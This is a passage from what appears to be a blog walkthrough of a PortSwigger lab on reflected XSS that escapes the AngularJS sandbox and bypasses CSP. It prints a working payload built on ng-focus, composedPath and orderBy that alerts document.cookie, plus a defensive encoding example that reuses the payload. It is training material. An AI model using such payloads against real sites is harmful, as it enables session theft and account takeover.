Introduction to Reflected XSS with AngularJS Sandbox Escape and CSP
Reflected cross-site scripting (XSS) with an AngularJS sandbox escape and a Content Security Policy (CSP) bypass is a web security vulnerability that arises when untrusted user input is reflected into a page without being properly sanitized or validated. The AngularJS framework’s built-in sandbox aims to prevent XSS attacks, but if the application fails to validate or sanitize user input, an attacker can bypass the sandbox and execute arbitrary scripts. To mitigate this vulnerability, web developers should follow secure coding practices, apply thorough input validation and output encoding, and enforce a strict Content Security Policy. Staying informed about AngularJS security updates, regularly reviewing and updating the Content Security Policy, and conducting security assessments also help reduce the risk of XSS vulnerabilities.
Lab Solutions | Practical Work Time XSS with AngularJS
This lab uses CSP and AngularJS.
To solve the lab, perform a cross-site scripting attack that bypasses CSP, escapes the AngularJS sandbox, and alerts document.cookie.
Stepwise solution of the lab:
After accessing this lab, we first noticed an option named Go to exploit server.
Click on Go to exploit server.
Without further ado, enter the payload below.
<script>
location='https://YOUR-LAB-ID.web-security-academy.net/?search=%3Cinput%20id=x%20ng-focus=$event.composedPath()|orderBy:%27(z=alert)(document.cookie)%27%3E#x';
</script>
Keep in mind that you have to replace YOUR-LAB-ID. Copy it from the lab URL; it will look something like 0aff00f00348ec23807c081800ec00c0.
Then just click Store and Deliver exploit to victim.
BOOM! The lab has been solved successfully.
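From the defender's side, the fix is in how the search term is reflected. The block below is an added example, not code from the lab or from the original article: it HTML-encodes the reflected value and marks the element ng-non-bindable so AngularJS does not compile it. The function names and the h1 template are hypothetical.

```javascript
// Added example; function names and the <h1> template are hypothetical.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// HTML-encode a value so it cannot open a tag or close an attribute.
function encodeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable pattern: the search term is reflected as raw markup, so an
// injected element with an ng-* event attribute reaches the AngularJS compiler.
function renderUnsafe(term) {
  return '<h1>Search results for: ' + term + '</h1>';
}

// Encoding stops new elements, but {{ }} in a text node is still treated as
// a template by AngularJS when the node sits inside the ng-app scope.
function renderEncodedOnly(term) {
  return '<h1>Search results for: ' + encodeHtml(term) + '</h1>';
}

// Hardened: encode, and mark the element ng-non-bindable so AngularJS does
// not compile or interpolate anything inside it.
function renderSafe(term) {
  return '<h1 ng-non-bindable>Search results for: ' + encodeHtml(term) + '</h1>';
}

// Rough check for this demo: what would AngularJS still act on in a fragment?
function angularExposure(fragment) {
  const nonBindable = fragment.startsWith('<h1 ng-non-bindable>');
  return {
    directiveAttr: /<[a-z][^>]*\sng-(?!non-bindable)[a-z-]+\s*=/i.test(fragment),
    interpolation: !nonBindable && fragment.includes('{{'),
  };
}

// The search value from the payload on this page, decoded, plus a
// constructed, harmless interpolation probe.
const labSearch = decodeURIComponent(
  "%3Cinput%20id=x%20ng-focus=$event.composedPath()|orderBy:%27(z=alert)(document.cookie)%27%3E");
const probe = '{{1+1}}';

console.log('unsafe      ', angularExposure(renderUnsafe(labSearch)));
console.log('encoded only', angularExposure(renderEncodedOnly(probe)));
console.log('safe        ', angularExposure(renderSafe(labSearch)), angularExposure(renderSafe(probe)));
```

The regex check is only a stand-in for the AngularJS compiler; in a real application the same three renderings can be compared in a browser test.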
Be ready for its other parts 🙂
I hope you enjoyed reading this article. Once you have completed it, we highly recommend that you study the next article: Reflected XSS protected by very strict CSP, with dangling markup attack. Please don’t forget to leave a comment here and share it with your friends as well. Good luck!
Thank you for reading. If this article really helped you, do share it with your mates.
And follow @masaudsec on Twitter.
FAQs
Website security refers to protecting a website or web application from cyberattacks, unauthorized access, or other security threats.
Web application security means protecting a website from cyberattacks. These attacks may include vulnerabilities such as SQL injection, XSS, file inclusion, and others.
It is always good practice to use an up-to-date browser. Keep your browser plugins up to date, avoid malicious websites and links, enable two-factor authentication, and watch out for clickjacking.
Searching for someone’s social security number or credit card information on the dark web is illegal and unethical. It is important to always avoid such activities and protect yourself and others from cyber threats.